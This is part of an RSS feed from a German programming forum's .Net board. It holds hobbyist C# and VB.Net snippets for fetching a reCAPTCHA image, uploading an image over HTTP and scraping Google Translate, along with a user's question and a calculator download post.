        captchaImage = Image.FromStream(req.GetResponse().GetResponseStream());<br />
    }<br />
<br />
    public string GetNoScriptField(string src) {<br />
        return Regex.Match(src, &quot;iframe src=\&quot;http://api.recaptcha.net/noscript\\?k=(&#91;A-Za-z0-9-_&#93;+)\&quot;&quot;).Groups&#91;1&#93;.Value;<br />
    }<br />
}<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script>
</div>
</div>
</div></div>


	<div style="padding:10px">

	
		<fieldset class="fieldset">
			<legend>Miniaturansichten angehängter Grafiken</legend>
			<div style="padding:10px">
			
<a href="https://u-labs.de/forum/attachment.php?attachmentid=3411&amp;d=1364919416" 
rel="Lightbox_35193" id="attachment3411"
><img class="thumbnail" src="https://u-labs.de/forum/attachment.php?attachmentid=3411&amp;stc=1&amp;thumb=1&amp;d=1364919416" 
alt="Klicke auf die Grafik für eine größere Ansicht&nbsp;

Name:	recaptcha-nojs.jpg&nbsp;
Hits:	-&nbsp;
Größe:	38,1 KB&nbsp;
ID:	3411"/></a>
&nbsp;

			</div>
		</fieldset>
	

	
		<fieldset class="fieldset">
			<legend>Angehängte Grafiken</legend>
				<div style="padding:10px">
				<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=3410&amp;stc=1&amp;d=1364919286" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=3412&amp;stc=1&amp;d=1364919436" alt="" />&nbsp;
			</div>
		</fieldset>
	

	

	

	</div>
]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>DMW007</dc:creator>
			<guid isPermaLink="true">net-94/c-google-recaptcha-bild-auslesen-4737</guid>
		</item>
		<item>
			<title>VB.Net Bild hochladen</title>
			<link>net-94/vb-net-bild-hochladen-4727?goto=newpost</link>
			<pubDate>Thu, 12 Jan 2012 15:34:13 GMT</pubDate>
			<description>Hallo, ich arbeite an einem Programm, das ein Bild hochladen soll, dabei wird ein eigenes Upload-Script verwendet, ich will also nicht auf abload.de...</description>
			<content:encoded><![CDATA[<div>Hallo, ich arbeite an einem Programm, das ein Bild hochladen soll, dabei wird ein eigenes Upload-Script verwendet, ich will also nicht auf abload.de etc hochladen und per FTP möchte ich es auch nicht machen.<br />
<br />
Folgenden Code habe ich im Internet gefunden und etwas angepasst:<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Public Sub upload(ByVal path As String, ByVal name As String)<br />
&nbsp; &nbsp; &nbsp; &nbsp; 'Grundgerüst<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim HttpWebRequest As Net.HttpWebRequest = HttpWebRequest.Create(&quot;http://link.li/ul.php&quot;)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim Boundary As String = &quot;---------------------------&quot; &amp; DateTime.Now.Ticks.ToString<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; HttpWebRequest.Credentials = CredentialCache.DefaultCredentials<br />
&nbsp; &nbsp; &nbsp; &nbsp; HttpWebRequest.Method = &quot;POST&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; HttpWebRequest.UserAgent = &quot;Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1) Gecko/20090624 Firefox/3.5&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; HttpWebRequest.Accept = &quot;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; HttpWebRequest.KeepAlive = &quot;300&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; HttpWebRequest.Referer = &quot;Referer: http://link.li/ul.php&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; HttpWebRequest.CookieContainer = New CookieContainer()<br />
&nbsp; &nbsp; &nbsp; &nbsp; HttpWebRequest.ContentType = &quot;multipart/form-data; boundary=&quot; &amp; Boundary<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; 'RequestStream Informationen<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim BoundaryBytes() As Byte = System.Text.Encoding.ASCII.GetBytes((&quot;--&quot; + Boundary &amp; Environment.NewLine))<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim InfoBytes() As Byte = System.Text.Encoding.ASCII.GetBytes(&quot;Content-Disposition: form-data; name=&quot;&quot;image&quot;&quot;; filename=&quot; &amp; name &amp; &quot;&quot; _<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &amp; Environment.NewLine &amp; &quot;Content-Type: image/png&quot; &amp; Environment.NewLine &amp; Environment.NewLine)<br />
&nbsp; &nbsp; &nbsp; &nbsp; HttpWebRequest.ContentLength = BoundaryBytes.Length &amp; InfoBytes.Length<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim FileInfo As New IO.FileInfo(path)<br />
&nbsp; &nbsp; &nbsp; &nbsp; HttpWebRequest.ContentLength += FileInfo.Length<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; 'RequestStream<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim RequestStream As Stream = HttpWebRequest.GetRequestStream<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; RequestStream.Write(BoundaryBytes, 0, BoundaryBytes.Length)<br />
&nbsp; &nbsp; &nbsp; &nbsp; RequestStream.Write(InfoBytes, 0, InfoBytes.Length)<br />
<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim FileStream As FileStream = File.Open(path, FileMode.Open)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim Buffer(1024) As Byte<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim BytesRead As Integer<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Do<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; BytesRead = FileStream.Read(Buffer, 0, Buffer.Length)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; RequestStream.Write(Buffer, 0, BytesRead)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Loop Until BytesRead = 0<br />
<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; FileStream.Close()<br />
&nbsp; &nbsp; &nbsp; &nbsp; RequestStream.Close()<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; 'RequestStream Antwort<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim HttpWebResponse As HttpWebResponse = HttpWebRequest.GetResponse<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; MsgBox(HttpWebResponse)<br />
<br />
&nbsp; &nbsp; End Sub</code><hr />
</div>Ich habe mir mit Live HTTP Headers noch den Code angesehen und es ein wenig angepasst. Ich bekomme immer folgenden Fehler ausgegeben:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Zitat:</div>
	<div class="bbcode_quote printable">
		<hr />
		
			Die Anfrage wurde abgebrochen: Die Anfrage wurde abgebrochen..
			
		<hr />
	</div>
</div>Ich weiß nicht woran es liegt und im Internet finde ich bis jetzt auch keinen vernünftigen Lösungsansatz.<br />
<br />
Kann jemand weiterhelfen?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Snees</dc:creator>
			<guid isPermaLink="true">net-94/vb-net-bild-hochladen-4727</guid>
		</item>
		<item>
			<title><![CDATA[[VB.NET] Tachenrechner v1.0 (Zu Verschenken)]]></title>
			<link>net-94/vb-net-tachenrechner-v1-0-zu-verschenken-4646?goto=newpost</link>
			<pubDate>Wed, 11 Jan 2012 11:05:30 GMT</pubDate>
			<description>Hi Liebe UH com ich habe mal meine alte Festplatte angeschlossen und da hatte ich noch nen paar Alte Projekte von mir und da hab ich den...</description>
			<content:encoded><![CDATA[<div>Hi Liebe UH com ich habe mal meine alte Festplatte angeschlossen und da hatte ich noch nen paar Alte Projekte von mir und da hab ich den Taschenrechner gefunden ;) vllt könnt ihr den ja gebrauchen.<br />
<br />
Download: <a href="http://www.multiupload.com/519CWGD7DT" target="_blank" rel="nofollow">Multiupload.com - upload your files to multiple file hosting sites!</a><br />
VirusTotal: <a href="http://www.virustotal.com/file-scan/report.html?id=ede85076c0a07b431e6da10606cb9b0894724c373b8a84abb206074068a3b244-1326280122" target="_blank" rel="nofollow">http://www.virustotal.com/file-scan/...244-1326280122</a><br />
<br />
MfG</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>getsha</dc:creator>
			<guid isPermaLink="true">net-94/vb-net-tachenrechner-v1-0-zu-verschenken-4646</guid>
		</item>
		<item>
			<title><![CDATA[[C#] Text mit Google übersetzen]]></title>
			<link>net-94/c-text-mit-google-uebersetzen-4422?goto=newpost</link>
			<pubDate>Sat, 07 Jan 2012 23:29:10 GMT</pubDate>
			<description>Hab ich auf meiner Festplatte gefunden hat glaub DMW007 oder Sky.NET damals im alten UHacks gepostet fand es nützlich vielleicht kanns jemadn...</description>
			<content:encoded><![CDATA[<div>Hab ich auf meiner Festplatte gefunden hat glaub DMW007 oder Sky.NET damals im alten UHacks gepostet fand es nützlich vielleicht kanns jemadn brauchen =)<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&#65279;using System;<br />
using System.Collections.Generic;<br />
using System.Linq;<br />
using System.Text;<br />
using System.Net;<br />
using System.IO;<br />
using System.Text.RegularExpressions;<br />
using System.Web;<br />
<br />
namespace TranslatorGUI {<br />
&nbsp; &nbsp; class Translator {<br />
&nbsp; &nbsp; &nbsp; &nbsp; public static string Transate(string from, string to, string txt) {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; return SendRequest(string.Format(&quot;http://translate.google.de/translate_a/t?client=t&amp;text={0}&amp;hl={1}&amp;sl={1}&amp;tl={2}&amp;multires=1&amp;prev=btn&amp;&quot; +<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  &quot;ssel=0&amp;tsel=0&amp;notlr=0&amp;sc=1&quot;, HttpUtility.UrlEncode(txt), from, to));<br />
&nbsp; &nbsp; &nbsp; &nbsp; }<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; private static string SendRequest(string url) {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; HttpWebRequest req = (HttpWebRequest)HttpWebRequest.Create(url);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; string source = new StreamReader(req.GetResponse().GetResponseStream()).ReadToEnd();<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; return Regex.Match(source, &quot;\\[\\[\\[\&quot;([^\&quot;]+)\&quot;,\&quot;&quot;).Groups[1].Value.ToLower();<br />
&nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; }<br />
}</code><hr />
</div></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Festplatte</dc:creator>
			<guid isPermaLink="true">net-94/c-text-mit-google-uebersetzen-4422</guid>
		</item>
	</channel>
</rss>
